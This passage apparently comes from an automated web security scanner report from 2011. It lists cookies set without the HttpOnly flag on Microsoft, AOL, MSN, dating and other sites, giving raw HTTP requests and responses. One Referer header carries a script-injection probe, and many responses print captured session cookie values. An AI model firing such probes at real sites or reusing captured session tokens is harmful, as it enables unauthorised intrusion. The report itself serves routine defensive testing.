
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/mm8byzo8zWE HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:55:03 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 9216

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Interview with Australian Cartoonist Peter Broelman</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css">
...[SNIP]...

17. Cookie without HttpOnly flag set
There are 501 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



17.1. http://advertising.aol.com/privacy/advertisingcom/opt-out

Summary

Severity:   Low
Confidence:   Firm
Host:   http://advertising.aol.com
Path:   /privacy/advertisingcom/opt-out

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/advertisingcom/opt-out HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:20 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=985ce46f8c25697973bf76c1fb01cf21; expires=Tue, 22 Feb 2011 05:38:40 GMT; path=/; domain=.advertising.aol.com
Last-Modified: Sun, 30 Jan 2011 01:56:38 GMT
ETag: "a2c20d0db593eb30d87922af962f68db"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Keep-Alive: timeout=15, max=77
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 31687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

17.2. http://c.microsoft.com/trans_pixel.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://c.microsoft.com
Path:   /trans_pixel.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-6&ti=We%20are%20sorry%2C%20the%20page%20you%20requested%20cannot%20be%20found.&si=1&sv=3.0&fi=1&fv=10.1&r=http%3A%2F%2Fburp%2Fshow%2F42&ts=1296399108879&sr=1920x1200&bs=1020x1715 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js'
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1296391908891:ss=1296391908891; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=de6cd851-c13e-496a-b118-22137b8dc5b1&Microsoft.CreationDate=01/30/2011 14:50:57&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.NumberOfVisits=1&SessionCookie.Id=699284D5514B373BB0DF32C40A1FD561; domain=microsoft.com; expires=Sun, 30-Jan-2011 15:20:57 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.VisitStartDate=01/30/2011 14:50:57&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=2&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0237-9950-5424-5770; domain=microsoft.com; expires=Mon, 30-Jan-2012 14:50:57 GMT; path=/
Set-Cookie: MS0=864ee6b5e2b44b9cadb6502b2d8e8c54; domain=.microsoft.com; expires=Sun, 30-Jan-2011 15:20:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 14:50:57 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

17.3. https://careers.microsoft.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://careers.microsoft.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: careers.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://careers.microsoft.com/gclp.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=imfrgsjgkicnzcjt42531kjd; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=h2kb0f3zzbexr4550xzpoczx; path=/; HttpOnly
Set-Cookie: SessionProfile=imfrgsjgkicnzcjt42531kjd; path=/; secure
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sat, 29 Jan 2011 23:45:40 GMT
Connection: close
Content-Length: 155

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://careers.microsoft.com/gclp.aspx">here</a>.</h2>
</body></html>

17.4. http://ccc01.opinionlab.com/o.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ccc01.opinionlab.com
Path:   /o.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /o.asp?id=swHtlTXj HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14859
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCQTCBBDR=KLBDJLOBBPPOPIONDAELIJLO; path=/
Date: Sat, 29 Jan 2011 23:45:32 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<title>Comment Card</title><script language="javascript" type="tex
...[SNIP]...

17.5. http://ccc01.opinionlab.com/o.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ccc01.opinionlab.com
Path:   /o.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /o.asp HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDASTCBBCQ=MBCDJLOBBDKPLCFLGGHFIDII; path=/
Date: Sat, 29 Jan 2011 23:45:32 GMT
Connection: close


17.6. http://ccc01.opinionlab.com/o.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ccc01.opinionlab.com
Path:   /o.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /o.asp HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSCDTCACS=FPMEIDMCJOFCBFNMKCBECFLJ; path=/
Date: Sun, 30 Jan 2011 16:42:21 GMT
Connection: close


17.7. http://dating.redacted/cp.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dating.redacted
Path:   /cp.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cp.aspx HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 29 Jan 2011 23:45:55 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Location: /errors/ErrorPage.aspx?aspxerrorpath=/cp.aspx
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=b696db19-d3c2-4ad4-a071-50a129f87faf; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: SECU=TID=516068; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferrors%2fErrorPage.aspx%3faspxerrorpath%3d%2fcp.aspx">here</a>.</h2>
</body></html>

17.8. http://dating.redacted/en-us/partner/msn/38028.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dating.redacted
Path:   /en-us/partner/msn/38028.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/partner/msn/38028.html HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:58 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:57 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:57 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=1d011f98-ba73-4855-b224-c4cf627b237b; expires=Sun, 29-Jan-2012 23:45:57 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=58b22e78-d897-4147-94de-7181130c66ec&THEME=84; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52342

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...

17.9. http://dating.redacted/index.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dating.redacted
Path:   /index.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.aspx HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:48 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=be2ed4ee-f5a1-4aa4-bb78-4689f6d90efb; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=6b75de65-2551-4051-a775-8f526e3162c3&THEME=215; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43950

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...

17.10. http://dating.redacted/search/index.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dating.redacted
Path:   /search/index.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/index.aspx HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:49 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=b2dc8c0f-b300-4020-86ce-39e4f8fd9272; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=e6d8d8dd-063a-4700-a8ac-b5738414eb12&THEME=215; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...

17.11. http://games.redacted/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://games.redacted
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: games.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-WR-L: 74,NC
Set-Cookie: MSGmSession=RUID=d177791d618543afa46923d904b9fd9b&Env=AP2; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:32 GMT
Connection: close
Content-Length: 45429


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta http-equiv=
...[SNIP]...

17.12. http://malexj.tk/6M

Summary

Severity:   Low
Confidence:   Firm
Host:   http://malexj.tk
Path:   /6M

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /6M HTTP/1.1
Host: malexj.tk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 02:09:32 GMT
Server: Resin/2.1.17
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Server: maloofuta.ams.taloha.net
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=aKD9jFE80awb; path=/
Connection: close


<html>
<head>
<title>malexj.tk</title>
<meta name="description" content="malexj.tk">
<meta name="keywords" content="malexj.tk">
</head>
<frameset rows="*" framespacing="0" border="0
...[SNIP]...

17.13. http://msn.chemistry.com/cp/landing/44762

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.chemistry.com
Path:   /cp/landing/44762

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cp/landing/44762 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=d278fc94-dbd7-4a08-8cb6-0a6b0f3e8a2e; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Session=SID=99B544F5-72EC-4453-B766-5821666E8BC4&Th=11&TID=508259; path=/
Set-Cookie: UMID=c7fdb268-bc89-4e0a-b9a5-5a3cbc611c0e; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28579

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...

17.14. http://msn.chemistry.com/cp/landing/57269

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.chemistry.com
Path:   /cp/landing/57269

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cp/landing/57269 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=8529a559-f7f1-4949-aed2-acc51bf1723b; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Session=SID=A963DE98-E013-45FE-A22F-7F3E03113FAE&Th=11&TID=508259; path=/
Set-Cookie: UMID=6abfa29e-5c60-42a5-b7be-7db42c89c8cb; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...

17.15. http://msn.foxsports.com/video

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /video

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 210537
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=72E4F63379582C3093F112CC8DFB1BD7; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=28
Date: Sat, 29 Jan 2011 23:49:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

17.16. http://msn.whitepages.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.whitepages.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: msn.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37 (Unix) mod_perl/1.30
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:50:09 GMT
Connection: close
Set-Cookie: wpn_persistent=max_utype%3Ddefault%26PID%3DTUSnsawQAEcAADI6GyA%26times_seen_invite%3D%26filled_demo_survey%3D%26wp_stage%3Dproduction%26persistent_search_count%3D%26had_successful_search%3D; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.whitepages.com
Set-Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; path=/; domain=.whitepages.com
Content-Length: 34492


            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...

17.17. http://photobucket.com/$|zone.redacted|xbox.com|www.aol.com/$|http:/Webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Low
Confidence:   Firm
Host:   http://photobucket.com
Path:   /$|zone.redacted|xbox.com|www.aol.com/$|http:/Webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /$|zone.redacted|xbox.com|www.aol.com/$|http:/Webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: photobucket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 30 Jan 2011 02:17:45 GMT
Server: Apache
Set-Cookie: flash=deleted; expires=Sat, 30-Jan-2010 02:17:44 GMT; path=/; domain=.photobucket.com
Set-Cookie: pb_userid=MjIyMjQ3YmIxNzA3YTk1ZGY5Y2NiZjNlZWZlYTI1NGEkYToxOntzOjc6InRyYWNraWQiO3M6MjQ6IjEyOTYzNTM4NjUuODk0NDM5MjkzMTkyMiI7fQ%3D%3D; expires=Tue, 19-Jan-2038 03:14:06 GMT; path=/; domain=.photobucket.com
Set-Cookie: pb_session=ZWI4OWU0ODgwY2E4MTQ5YmIwMjAxODVmN2M3ZGRmMDQkYToyOntzOjQ6InRpbWUiO2k6MTI5NjM1Mzg2NTtzOjQ6InVuaXEiO3M6MjU6IjEyOTYzNTM4NjUuODk0ODE0NTQzMzA1OTYiO30%3D; path=/; domain=.photobucket.com
Location: http://photobucket.com/findstuff/?httpstatus=404
Content-Length: 0
Connection: close
Content-Type: text/html


17.18. https://secure.opinionlab.com/ccc01/comment_card.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card.asp?time1= HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
